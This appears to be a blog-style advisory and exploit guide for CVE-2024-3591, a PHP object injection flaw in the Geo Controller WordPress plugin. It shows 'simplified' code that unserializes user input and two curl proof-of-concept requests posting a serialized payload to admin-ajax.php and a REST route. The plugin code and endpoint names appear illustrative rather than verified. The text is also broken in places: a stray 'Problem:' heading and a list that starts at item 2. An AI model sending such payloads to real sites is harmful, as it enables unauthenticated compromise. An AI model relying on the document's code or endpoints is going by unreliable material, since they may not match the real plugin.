CVE-2024-3591 - Critical PHP Object Injection in Geo Controller WordPress Plugin – Unauthenticated Exploit Guide

A major vulnerability (CVE-2024-3591) has been discovered in the popular Geo Controller WordPress plugin (all versions before 8.6.5). If you’re running this plugin, your website might be at risk for a dangerous hack called PHP Object Injection that unauthenticated attackers can use—even if they don’t have an account!

What is PHP Object Injection?

PHP Object Injection happens when an attacker tricks your site into loading dangerous data into memory. This can lead to remote code execution, information leaks, and a total site compromise—especially if a hacker can reach a vulnerable “gadget” (a piece of PHP code they can use).

CVE-2024-3591 – The Vulnerability

The Geo Controller plugin allows website owners to manage content based on visitor locations. Versions before 8.6.5 contain an insecure pattern:

With no user authentication required, even anonymous visitors can send malicious data!

*If a “gadget chain” exists on the server (from this plugin or another), a hacker can abuse it for code execution.*

Let’s look at a simplified version of how the plugin handled user input

// geo-controller/includes/ajax.php

if (isset($_POST['payload'])) {
    $data = unserialize($_POST['payload']);
    process_data($data);
}

Or, in the REST API route handler

// geo-controller/includes/api.php

function handle_api_request($request) {
    $payload = $request->get_param('payload');
    $data = unserialize($payload);
    do_something($data);
}

Problem:

Find the vulnerable AJAX or REST endpoint.

- Example AJAX request to /wp-admin/admin-ajax.php?action=geo_action
- Example REST request to /wp-json/geo-controller/v1/data

Proof-of-Concept (PoC) – For Testing Only!

curl -X POST \
  -d 'action=geo_action' \
  --data-urlencode "payload=O:8:\"ExploitA\":1:{s:4:\"data\";s:16:\"echo+HACKED+123\";}" \
  http://target-site.com/wp-admin/admin-ajax.php

Or with REST API

curl -X POST \
  -H "Content-Type: application/json" \
  -d '{"payload": "O:8:\"ExploitA\":1:{s:4:\"data\";s:16:\"echo+HACKED+123\";}"}' \
  http://target-site.com/wp-json/geo-controller/v1/data

*(You’d need to adjust this for a real gadget chain in your environment!)*

References and Fixes

- WPScan Advisory
- Geo Controller changelog
- PHP Unserialization Attack explanation (OWASP)

The official fix, released in v8.6.5, stops unserialize() from running on user data.
Upgrade ASAP: Geo Controller >= 8.6.5 is safe.

Go to your WordPress dashboard > Plugins > Geo Controller > Update.

2. Always run the latest plugins/themes.

Conclusion

CVE-2024-3591 is easy to exploit and dangerous—fix it today!
If you found this advisory helpful, spread the word. For more details, check the official WPScan entry.

Timeline

Published on: 05/01/2024 06:15:21 UTC
Last modified on: 07/03/2024 02:06:23 UTC